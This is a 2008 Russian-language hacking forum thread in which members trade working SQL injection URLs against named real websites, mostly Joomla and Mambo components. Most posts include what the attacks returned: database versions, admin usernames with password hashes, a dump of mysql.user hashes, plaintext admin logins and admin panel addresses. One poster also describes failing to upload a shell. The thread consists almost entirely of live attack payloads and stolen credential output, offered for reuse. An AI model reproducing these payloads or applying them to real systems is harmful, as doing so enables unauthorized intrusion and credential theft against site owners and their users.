ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.02.2008, 04:07
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
http://la2ic.ru/notes.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*
5.0.41-community-log
la2icru_1
la2icru@localhost
-1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1--
обязательно добью 
Последний раз редактировалось xcedz; 13.02.2008 в 17:01..
|
|
|
13.02.2008, 08:35
|
|
Участник форума
Регистрация: 25.12.2005
Сообщений: 151
Провел на форуме:
874713
Репутация:
53
|
|
xcedz
-1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1--
не работает .
|
|
|
|
13.02.2008, 08:43
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Код:
http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users/*
http://www.job.khit.info/administrator/
admin:40b5bf20806a044392ea48bc5c436262
SQL Инъекция в Joomla/Mambo Component Job (com_job), нашел я, но сайтов больше с такой инъекцией не нашел.
еще таблицы на этом домене (другие движки)
Код:
http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22,23,24,25+from+information_schema.tables/*
|
|
|
|
13.02.2008, 08:46
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от Vallez
xcedz
-1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1--
не работает .
пробел сотри
должно быть так
-1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1--
Последний раз редактировалось xcedz; 13.02.2008 в 08:49..
|
|
|
|
13.02.2008, 09:31
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
Код HTML:
http://www.islamicamagazine.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.pinfosystems.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.marketinginstyle.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.hatfielddesign.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.mangsidig.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.minet-services.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.bacanak.net/1/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.adeosys.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.sonicracingteam.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.fogl.co.yu/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.g-linq.nl/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.ninaris.hu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users+limit+1/*
http://www.pcl-assistance.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.regionaleartiesten.nl/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.seventystudio.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.rstasarim.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.tribudefilles.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.open-business.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
PS Начинаем утреннею зарядку =))) |
|
|
|
13.02.2008, 10:39
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Mambo Component Events SQL Injection
Код:
http://www.nwen.org/index.php?option=com_events&Itemid=15&id=-1+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mos_users/*
http://www.nwen.org/administrator/
admin;admin
Найдено мной, сайтов с данным компонентом много, но на большинства, почему-то ничего не передается параметром id, который собственно и уязвим =/
Последний раз редактировалось it's my; 13.02.2008 в 10:41..
|
|
|
|
13.02.2008, 12:44
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
http://www.kompak.ru:8100/new/news/new.php?num=-342+union+select+1,2,3,4,5,6,7/*
dbname = www
dbuser =www@localhost
dbversion =4.0.20
|
|
|
|
13.02.2008, 14:04
|
|
Новичок
Регистрация: 23.01.2008
Сообщений: 15
Провел на форуме:
20588
Репутация:
63
|
|
www.uselessjunk.com PR4
http://www.uselessjunk.com/article_full.php?id=-12689+union+select+1,2,3,4,5,concat_ws(0x3A3a,vers ion(),database(),user()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23/*
version: 5.0.26-Debian_2-log
database: uselessj_uj2006
user: uselessj_ohshitw@localhost
http://www.uselessjunk.com/article_full.php?id=-12689+union+select+1,2,3,4,5,concat_ws(0x3A3a,fld_ username,fld_password,fld_id),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23+from+tbl_admin/*
Через лимит выводим всех админов.
www.uselessjunk.com/admin.php -админка.
Есть форум, на дедике.
Но выведенные данные не подошли никуда,а к фтп я так и не смог законнектица.Шелл залить так же не вышло.
|
|
|
|
13.02.2008, 15:39
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175
Репутация:
252
|
|
Код:
http://www.novostroy.ru/law/direct.php?num=1056437&id=99999+union+select+1,2,3/*
wwwnov@localhost:law:4.0.27-1-log
Код:
http://www.wholehealthexpo.com/information.php?infoid=99999+union+select+1,2,3,4,5,6/*
dbheal@linhostssl16.prod.mesa1.secureserver.net:db heal:4.0.27-max-log
Код:
http://www.plenki.net/shipping.php?infoID=99999+union+select+1,2,3/*
u10744@10.10.153.160:u10744:5.0.45-log
Код:
http://www.betonmaster.ru/index.php?view_info=yes&infoID=99999+union+select+1,2,3,4/*
zrim@localhost:betonmaster:4.1.22-log
Код:
http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,concat_ws(0x3a,user,PASS),5,6,7,8,9,10,11+from+users+limit+0,1/*
roundcube:583e2e1b2957e824 |
|
|
|
13.02.2008, 15:45
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,concat(user, 0x3a,password)+from+mysql.user/*
admin:40e369d51c6bd8e2
pma_WHy8zYQ73Zhn:1c4230400a8e14af
horde:234994c1665bd570
nl_star:270037157a74bbe3
nl_star_django:2490e08f0895cc0b
:PPPPPPP
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Линейный вид
